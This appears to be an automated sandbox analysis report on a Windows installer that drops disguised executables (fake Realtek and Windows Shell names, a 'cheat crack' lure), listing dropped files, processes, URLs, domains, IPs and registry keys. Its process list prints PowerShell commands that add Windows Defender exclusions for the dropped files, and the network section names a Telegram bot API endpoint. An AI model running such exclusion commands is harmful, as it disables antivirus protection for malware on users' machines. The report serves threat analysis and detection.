Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
EsgeCzT4do.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe
|
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13reghff.hzl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2e5qx4xb.1fw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2r4rpn2a.rih.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3au5jnhw.n44.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lubasfp.r5p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53zxwhos.0tc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5kgtrc1o.2ar.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddg0kimi.nsc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0ht1lfg.fec.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftbpsrj3.tyv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmfuogxt.c2z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlyp5nbn.0iy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3dmw1uq.xor.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okvgvzf2.ikb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pv3w20oi.4fy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxbq1ntv.ahy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1rafy4p.1sv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkalmaoi.bod.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyd2xory.3uq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0giojz4.ckc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spl3otks.3wy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1vyl0wh.l00.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucclzers.5ol.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd0h4hus.3t0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwo2oozg.rba.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xz0toufy.tpx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqc2jep2.bny.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3wsugjr.a1a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:10 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:10 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:09 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:10 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:09 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
Chrome Cache Entry: 154
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 155
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 156
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 157
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 158
|
ASCII text, with very long lines (13325)
|
dropped
|
||
Chrome Cache Entry: 159
|
Unicode text, UTF-8 text, with very long lines (30648)
|
dropped
|
||
Chrome Cache Entry: 160
|
ASCII text, with very long lines (16223)
|
downloaded
|
||
Chrome Cache Entry: 161
|
MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
|
dropped
|
||
Chrome Cache Entry: 162
|
ASCII text, with very long lines (9343)
|
dropped
|
||
Chrome Cache Entry: 163
|
ASCII text, with very long lines (21762)
|
dropped
|
||
Chrome Cache Entry: 164
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 165
|
ASCII text, with very long lines (12244)
|
dropped
|
||
Chrome Cache Entry: 166
|
ASCII text, with very long lines (467)
|
downloaded
|
||
Chrome Cache Entry: 167
|
ASCII text, with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 168
|
JSON data
|
downloaded
|
||
Chrome Cache Entry: 169
|
Web Open Font Format (Version 2), TrueType, length 39424, version 2.66
|
downloaded
|
||
Chrome Cache Entry: 170
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 171
|
ASCII text, with very long lines (17640)
|
dropped
|
||
Chrome Cache Entry: 172
|
HTML document, ASCII text, with very long lines (1232)
|
downloaded
|
||
Chrome Cache Entry: 173
|
ASCII text, with very long lines (17618)
|
downloaded
|
||
Chrome Cache Entry: 174
|
ASCII text, with very long lines (8042), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 175
|
ASCII text, with very long lines (8522)
|
downloaded
|
||
Chrome Cache Entry: 176
|
JSON data
|
downloaded
|
||
Chrome Cache Entry: 177
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 178
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 179
|
Unicode text, UTF-8 text, with very long lines (65452), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 180
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 181
|
ASCII text, with very long lines (10980)
|
dropped
|
||
Chrome Cache Entry: 182
|
ASCII text, with very long lines (13632)
|
dropped
|
||
Chrome Cache Entry: 183
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 184
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 185
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 186
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 187
|
ASCII text, with very long lines (9343)
|
downloaded
|
||
Chrome Cache Entry: 188
|
ASCII text, with very long lines (17618)
|
dropped
|
||
Chrome Cache Entry: 189
|
Web Open Font Format (Version 2), TrueType, length 179380, version 2.459
|
downloaded
|
||
Chrome Cache Entry: 190
|
ASCII text, with very long lines (7679)
|
downloaded
|
||
Chrome Cache Entry: 191
|
RIFF (little-endian) data, Web/P image
|
dropped
|
||
Chrome Cache Entry: 192
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 193
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 194
|
Unicode text, UTF-8 text, with very long lines (30648)
|
downloaded
|
||
Chrome Cache Entry: 195
|
ASCII text, with very long lines (18413)
|
downloaded
|
||
Chrome Cache Entry: 196
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 197
|
ASCII text, with very long lines (8522)
|
dropped
|
||
Chrome Cache Entry: 198
|
ASCII text, with very long lines (13325)
|
downloaded
|
||
Chrome Cache Entry: 199
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 200
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 201
|
ASCII text, with very long lines (21762)
|
downloaded
|
||
Chrome Cache Entry: 202
|
Web Open Font Format (Version 2), TrueType, length 38156, version 2.66
|
downloaded
|
||
Chrome Cache Entry: 203
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
Chrome Cache Entry: 204
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 205
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 206
|
ASCII text, with very long lines (7029)
|
downloaded
|
||
Chrome Cache Entry: 207
|
Web Open Font Format (Version 2), TrueType, length 43364, version 3.131
|
downloaded
|
||
Chrome Cache Entry: 208
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 209
|
ASCII text, with very long lines (5552)
|
dropped
|
||
Chrome Cache Entry: 210
|
ASCII text, with very long lines (29176)
|
dropped
|
||
Chrome Cache Entry: 211
|
Web Open Font Format (Version 2), TrueType, length 45868, version 3.131
|
downloaded
|
||
Chrome Cache Entry: 212
|
ASCII text, with very long lines (467)
|
dropped
|
||
Chrome Cache Entry: 213
|
MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
|
downloaded
|
||
Chrome Cache Entry: 214
|
ASCII text, with very long lines (7679)
|
dropped
|
||
Chrome Cache Entry: 215
|
ASCII text, with very long lines (12244)
|
downloaded
|
||
Chrome Cache Entry: 216
|
Web Open Font Format (Version 2), TrueType, length 39724, version 2.66
|
downloaded
|
||
Chrome Cache Entry: 217
|
Web Open Font Format (Version 2), TrueType, length 137140, version 2.459
|
downloaded
|
||
Chrome Cache Entry: 218
|
ASCII text, with very long lines (17414)
|
downloaded
|
||
Chrome Cache Entry: 219
|
ASCII text, with very long lines (7029)
|
dropped
|
||
Chrome Cache Entry: 220
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 221
|
ASCII text, with very long lines (16223)
|
dropped
|
||
Chrome Cache Entry: 222
|
ASCII text, with very long lines (35788)
|
downloaded
|
||
Chrome Cache Entry: 223
|
ASCII text, with very long lines (3481)
|
dropped
|
||
Chrome Cache Entry: 224
|
RIFF (little-endian) data, Web/P image
|
downloaded
|
||
Chrome Cache Entry: 225
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 226
|
ASCII text, with very long lines (18413)
|
dropped
|
||
Chrome Cache Entry: 227
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 228
|
assembler source, ASCII text, with very long lines (19387)
|
downloaded
|
||
Chrome Cache Entry: 229
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 230
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 231
|
ASCII text, with very long lines (905)
|
downloaded
|
||
Chrome Cache Entry: 232
|
ASCII text, with very long lines (3481)
|
downloaded
|
||
Chrome Cache Entry: 233
|
ASCII text, with very long lines (13632)
|
downloaded
|
||
Chrome Cache Entry: 234
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 235
|
Web Open Font Format (Version 2), TrueType, length 139388, version 2.459
|
downloaded
|
||
Chrome Cache Entry: 236
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
Chrome Cache Entry: 237
|
Unicode text, UTF-8 text, with very long lines (65452), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 238
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 239
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 240
|
ASCII text, with very long lines (17414)
|
dropped
|
||
Chrome Cache Entry: 241
|
Web Open Font Format (Version 2), TrueType, length 39764, version 2.66
|
downloaded
|
||
Chrome Cache Entry: 242
|
ASCII text, with very long lines (5552)
|
downloaded
|
||
Chrome Cache Entry: 243
|
ASCII text, with very long lines (8076), with no line terminators
|
dropped
|
||
Chrome Cache Entry: 244
|
ASCII text, with very long lines (10980)
|
downloaded
|
||
Chrome Cache Entry: 245
|
SVG Scalable Vector Graphics image
|
dropped
|
||
Chrome Cache Entry: 246
|
ASCII text, with very long lines (17640)
|
downloaded
|
||
Chrome Cache Entry: 247
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
There are 123 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\EsgeCzT4do.exe
|
"C:\Users\user\Desktop\EsgeCzT4do.exe"
|
||
C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
|
"C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe"
|
||
C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe
|
"C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe"
|
||
C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe
|
"C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek
HD Audio Universal Service.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows
Shell Experience Host.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows
Shell Experience Host.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek
HD Audio Universal Service.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows
Shell Experience Host.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek
HD Audio Universal Service.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows
Shell Experience Host.exe'
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://discord.gg/BNXa5rYFXM
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US
--service-sandbox-type=audio --mojo-platform-channel-handle=4292 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService
--lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 13 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
147.185.221.20
|
|||
https://discord.com/assets/ed216fb74081c12ffece.js
|
162.159.137.232
|
||
https://discord.com/assets/9017b7062734e72bb476.svg
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=vi
|
unknown
|
||
https://discord.com/assets/822c37e354b4a39dd6ca.js
|
162.159.137.232
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://cdn.discordapp.com/icons/1250434927087058944/06f5aa2f0dfc1da41888860135dc216c.webp?size=64
|
162.159.129.233
|
||
https://discord.com/invite/BNXa5rYFXM?locale=nl
|
unknown
|
||
https://discord.com/assets/5067a2ec1b24a6de868c.js
|
162.159.137.232
|
||
https://discord.com/assets/a5ec2b74d0cc337d4481.svg
|
162.159.137.232
|
||
http://www.micom/pkiops/Docs/ry.htm0
|
unknown
|
||
https://discordapp.com
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=el
|
unknown
|
||
https://a.nel.cloudflare.com/report/v4?s=GiAivlQtaD9GFJpm8xZYxExManF7Z4bjXM9JozZdyf6DeKZXSfqB%2B6NDWkMbwIw7UwFSHVtJxSekpD7StZihTgeNBbq1NWruszvBEErrBxoJl2IPt7dHhSEyET8G
|
35.190.80.1
|
||
https://discord.com/invite/BNXa5rYFXM?locale=zh-TW
|
unknown
|
||
https://discord.com/assets/webMinimal.3d98e446c302b2b42423.js
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=uk
|
unknown
|
||
https://discord.com/assets/5430e9964fe8364e084d.svg
|
162.159.137.232
|
||
https://discord.com/assets/ecff74bf4394e6e58dd1.woff2
|
162.159.137.232
|
||
https://discord.com/assets/1222195a37d6dd10994e.woff2
|
162.159.137.232
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://discord.com/download
|
unknown
|
||
https://discord.com/assets/af5116b1db004acbdb8b.svg
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=lt
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=de
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=zh-CN
|
unknown
|
||
http://www.microsoft.c
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=en-GB
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM
|
|||
https://discord.com/assets/f5b8aa3411dfc24ff2e6.woff2
|
162.159.137.232
|
||
https://discord.com/assets/d4dcfe8e106a8072717f.js
|
162.159.137.232
|
||
https://discord.com/assets/c1b53be672aac192a996.woff2
|
162.159.137.232
|
||
https://discord.com
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=es-419
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=he
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://discord.com/guidelines
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=pl
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://discord.com/api/v9/auth/location-metadata
|
162.159.137.232
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://discord.gg/fortnite
|
unknown
|
||
https://discord.com/assets/1098b8da25f51e58cea4.js
|
162.159.137.232
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
https://discord.com/assets/8234e0a75aa9afb205bd.woff2
|
162.159.137.232
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://discord.com/api/v9/science
|
162.159.137.232
|
||
https://discord.com/assets/8143f89919f42e84b455.js
|
162.159.137.232
|
||
https://discord.com/assets/771babda7e3dcee4f677.js
|
162.159.137.232
|
||
https://discord.com/assets/b21c5111a12372139409.woff2
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=no
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=fi
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=sv-SE
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=fr
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=ja
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=ar
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=ro
|
unknown
|
||
https://discord.com/assets/2597d11c1e039607373e.svg
|
162.159.137.232
|
||
https://discord.com/assets/sentry.0a75547723fa3698c125.js
|
162.159.137.232
|
||
https://discord.com/assets/3c99eb87778b9ed038d5.js
|
162.159.137.232
|
||
https://discord.com/assets/f587337433e36ce917bd.js
|
162.159.137.232
|
||
https://contoso.com/License
|
unknown
|
||
https://discord.com/assets/2917679ca8a08c390036.css
|
162.159.137.232
|
||
https://discord.com/assets/410a2166a48c9e482e2a.svg
|
162.159.137.232
|
||
https://discord.com/assets/a6f6204cd40c3c5f5c14.js
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=it
|
unknown
|
||
https://discord.com/assets/05bd1eb5dea5ee3387f4.js
|
162.159.137.232
|
||
https://a.nel.cloudflare.com/report/v4?s=x3K2CLqwhXLFkIv8%2FtEWtlMII%2BNHxQ8tHY7DQ1Nux55gkB4QzYtVftg9FhBongq00wL789ErxqlAVWLd4IIOI9P3K4WT39L%2Fg5swK%2Bkcwt%2B1UczC6L7zJ%2B9p4cHD
|
35.190.80.1
|
||
https://discord.com/blog/important-policy-updates
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://discord.com/assets/0e5029fd9cd4812b6712.svg
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=id
|
unknown
|
||
https://discord.com/assets/8bd8143eff37936894aa.woff2
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=hi
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=hu
|
unknown
|
||
https://support.discord.com/hc/en-us/articles/360017693772-Managing-Subscriptions-and-Billing-FAQ
|
unknown
|
||
https://discord.com/assets/09a6f112fcbc17f6cfd4.js
|
162.159.137.232
|
||
https://support.discord.com/hc/en-us/articles/4410339366295-Paid-Services-Terms
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=hr
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://twitter.com/discord
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=th
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=da
|
unknown
|
||
https://discord.com/invite/BNXa5rYFXM?locale=tr
|
unknown
|
||
https://discord.com/assets/55ad931ed92a15c15709.js
|
162.159.137.232
|
||
https://discord.com/assets/452d7be36bf4b23241bd.woff2
|
162.159.137.232
|
||
https://discord.com/assets/d67c5e680608266a1f63.js
|
162.159.137.232
|
||
https://discord.com/assets/ab03f7053698d417194c.svg
|
162.159.137.232
|
||
https://discord.com/cdn-cgi/challenge-platform/h/g/jsd/r/8e73d00e4bfe422e
|
162.159.137.232
|
||
https://discord.com/assets/52015caea7357a7a60a9.js
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=es-ES
|
unknown
|
||
https://discord.com/assets/8e217faefc0006e5a018.js
|
162.159.137.232
|
||
https://discord.com/assets/favicon.ico
|
162.159.137.232
|
||
https://discord.com/invite/BNXa5rYFXM?locale=ko
|
unknown
|
||
https://discord.com/assets/0a52c6142094387fceed.js
|
162.159.137.232
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
discord.gg
|
162.159.130.234
|
||
a.nel.cloudflare.com
|
35.190.80.1
|
||
discord.com
|
162.159.137.232
|
||
cdn.discordapp.com
|
162.159.129.233
|
||
ip-api.com
|
208.95.112.1
|
||
www.google.com
|
142.250.181.100
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.250.181.100
|
www.google.com
|
United States
|
||
192.168.2.5
|
unknown
|
unknown
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
162.159.130.234
|
discord.gg
|
United States
|
||
162.159.137.232
|
discord.com
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
162.159.129.233
|
cdn.discordapp.com
|
United States
|
||
35.190.80.1
|
a.nel.cloudflare.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
FileTracingMask
|
||
